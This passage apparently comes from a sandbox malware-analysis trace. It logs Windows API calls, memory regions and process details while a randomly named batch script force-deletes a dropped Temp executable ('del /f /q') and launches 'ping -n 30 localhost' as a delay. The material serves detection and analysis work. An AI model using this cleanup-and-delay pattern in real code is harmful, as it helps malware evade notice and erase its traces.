_open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.853] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.853] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.854] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.854] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.854] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12efa0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x12efa0*=0x3e, lpOverlapped=0x0) returned 1 [0126.854] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n") returned 62 [0126.854] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.854] GetFileType (hFile=0x54) returned 0x1 [0126.854] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.854] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.855] _tell (_FileHandle=3) returned 145 [0126.855] _close (_FileHandle=3) returned 0 [0126.855] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12ed74 | out: _Buffer="\r\n") returned 2 [0126.855] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.855] GetFileType (hFile=0x7) returned 0x2 [0126.855] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.855] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed34 | out: lpMode=0x12ed34) returned 1 [0126.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.856] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12ed60, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ed60*=0x2) returned 1 [0126.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.856] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x12ed70 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0126.856] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x12ed70 | out: _Buffer=">") returned 1 [0126.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.856] GetFileType (hFile=0x7) returned 0x2 [0126.856] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.856] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed38 | out: lpMode=0x12ed38) returned 1 [0126.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.856] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x12ed64, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x12ed64*=0x19) returned 1 [0126.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.857] GetFileType (hFile=0x7) returned 0x2 [0126.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efbc | out: lpMode=0x12efbc) returned 1 [0126.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.857] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x19f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x12efe8, lpReserved=0x0 | out: lpBuffer=0x19f008*, lpNumberOfCharsWritten=0x12efe8*=0x3) returned 1 [0126.857] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x12eff4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" ") returned 58 [0126.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.857] GetFileType (hFile=0x7) returned 0x2 [0126.857] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efb4 | out: lpMode=0x12efb4) returned 1 [0126.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x12efe0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12efe0*=0x3a) returned 1 [0126.858] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12f014 | out: _Buffer="\r\n") returned 2 [0126.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.858] GetFileType (hFile=0x7) returned 0x2 [0126.858] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.858] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efd4 | out: lpMode=0x12efd4) returned 1 [0126.858] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f000, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12f000*=0x2) returned 1 [0126.858] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0126.858] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0126.858] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0126.859] GetConsoleTitleW (in: lpConsoleTitle=0x12eb84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.859] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12dbfc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12dc00, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12dbfc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0126.859] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0126.859] _wcsicmp (_String1="w588H5dN.exe", _String2=".") returned 73 [0126.859] _wcsicmp (_String1="w588H5dN.exe", _String2="..") returned 73 [0126.859] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0xffffffff [0126.859] GetLastError () returned 0x2 [0126.859] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0126.859] _wcsicmp (_String1="w588H5dN.exe", _String2=".") returned 73 [0126.859] _wcsicmp (_String1="w588H5dN.exe", _String2="..") returned 73 [0126.859] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0xffffffff [0126.860] GetLastError () returned 0x2 [0126.860] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", fInfoLevelId=0x0, lpFindFileData=0x1a0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a0554) returned 0xffffffff [0126.860] GetLastError () returned 0x2 [0126.860] _get_osfhandle (_FileHandle=2) returned 0xb [0126.860] GetFileType (hFile=0xb) returned 0x2 [0126.860] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0126.860] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12e5fc | out: lpMode=0x12e5fc) returned 1 [0126.860] _get_osfhandle (_FileHandle=2) returned 0xb [0126.860] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12e630 | out: lpConsoleScreenBufferInfo=0x12e630) returned 1 [0126.860] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0126.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.861] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.861] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.862] SetConsoleInputExeNameW () returned 0x1 [0126.862] GetConsoleOutputCP () returned 0x1b5 [0126.862] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.862] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.862] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12efbc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.862] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.862] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.862] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.862] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.862] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.862] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12efa0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x12efa0*=0x0, lpOverlapped=0x0) returned 1 [0126.862] GetLastError () returned 0x0 [0126.862] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] GetFileType (hFile=0x54) returned 0x1 [0126.863] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.863] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.863] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12ef84, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x12ef84*=0x0, lpOverlapped=0x0) returned 1 [0126.863] GetLastError () returned 0x0 [0126.863] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] GetFileType (hFile=0x54) returned 0x1 [0126.863] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.863] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.863] longjmp () [0126.863] _tell (_FileHandle=3) returned 145 [0126.863] _close (_FileHandle=3) returned 0 [0126.863] CmdBatNotification () returned 0x0 [0126.863] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.863] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.864] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.864] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.864] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.864] SetConsoleInputExeNameW () returned 0x1 [0126.864] GetConsoleOutputCP () returned 0x1b5 [0126.864] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.864] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.864] exit (_Code=0) Process: id = "62" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea166c0" os_pid = "0xed0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "59" os_parent_pid = "0xe7c" cmd_line = "ping -n 30 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8825 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8826 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8827 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8828 start_va = 0x240000 end_va = 0x247fff entry_point = 0x240000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 8829 start_va = 0x250000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 8830 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8831 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8832 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8833 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8834 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8835 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8836 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8837 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8838 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8839 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 8840 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8841 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8842 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8843 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8844 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8845 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8846 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8847 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8848 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8849 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8850 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8851 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8852 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8853 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8854 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8855 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8856 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8857 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8858 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 8859 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 8860 start_va = 0x1b0000 end_va = 0x1b2fff entry_point = 0x1b0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 8861 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 8862 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 8863 start_va = 0x290000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 8864 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8865 start_va = 0x1180000 end_va = 0x144efff entry_point = 0x1180000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8866 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8867 start_va = 0x1450000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 8868 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 8869 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 8870 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8871 start_va = 0x1560000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001560000" filename = "" Region: id = 8872 start_va = 0x3f0000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 8873 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8874 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8923 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 8924 start_va = 0x1450000 end_va = 0x14affff entry_point = 0x0 region_type = private name = "private_0x0000000001450000" filename = "" Region: id = 8925 start_va = 0x1520000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x0000000001520000" filename = "" Region: id = 9040 start_va = 0x16a0000 end_va = 0x16dffff entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 9041 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 9152 start_va = 0x15f0000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 9153 start_va = 0x1650000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 9154 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 106 os_tid = 0xed4 [0117.777] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f7ec | out: lpSystemTimeAsFileTime=0x28f7ec*(dwLowDateTime=0x83726d00, dwHighDateTime=0x1d440a9)) [0117.777] GetCurrentProcessId () returned 0xed0 [0117.777] GetCurrentThreadId () returned 0xed4 [0117.777] GetTickCount () returned 0x27eb0 [0117.777] QueryPerformanceCounter (in: lpPerformanceCount=0x28f7e4 | out: lpPerformanceCount=0x28f7e4*=17456595701) returned 1 [0117.777] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0117.777] __set_app_type (_Type=0x1) [0117.777] __p__fmode () returned 0x76b331f4 [0117.778] __p__commode () returned 0x76b331fc [0117.778] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x242ae1) returned 0x0 [0117.778] __getmainargs (in: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8, _DoWildCard=0, _StartInfo=0x2450e8 | out: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8) returned 0 [0117.778] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.778] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.778] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x245440 | out: lpWSAData=0x245440) returned 0 [0117.785] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x28f27c | out: phkResult=0x28f27c*=0x58) returned 0x0 [0117.785] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x28f270, lpData=0x28f278, lpcbData=0x28f274*=0x4 | out: lpType=0x28f270*=0x0, lpData=0x28f278*=0x0, lpcbData=0x28f274*=0x4) returned 0x2 [0117.785] RegCloseKey (hKey=0x58) returned 0x0 [0117.786] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x28f244*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x28f26c | out: ppResult=0x28f26c*=0x0) returned 11001 [0117.786] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x28f244*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x28f26c | out: ppResult=0x28f26c*=0x4a3788*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x4a3850*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4a3878*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4a27f0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0118.364] FreeAddrInfoW (pAddrInfo=0x4a3788*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x4a3850*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4a3878*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4a27f0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0118.364] Icmp6CreateFile () returned 0x4a8b88 [0118.642] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x4a38c8 [0118.642] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x4aec00 [0118.643] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.643] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, 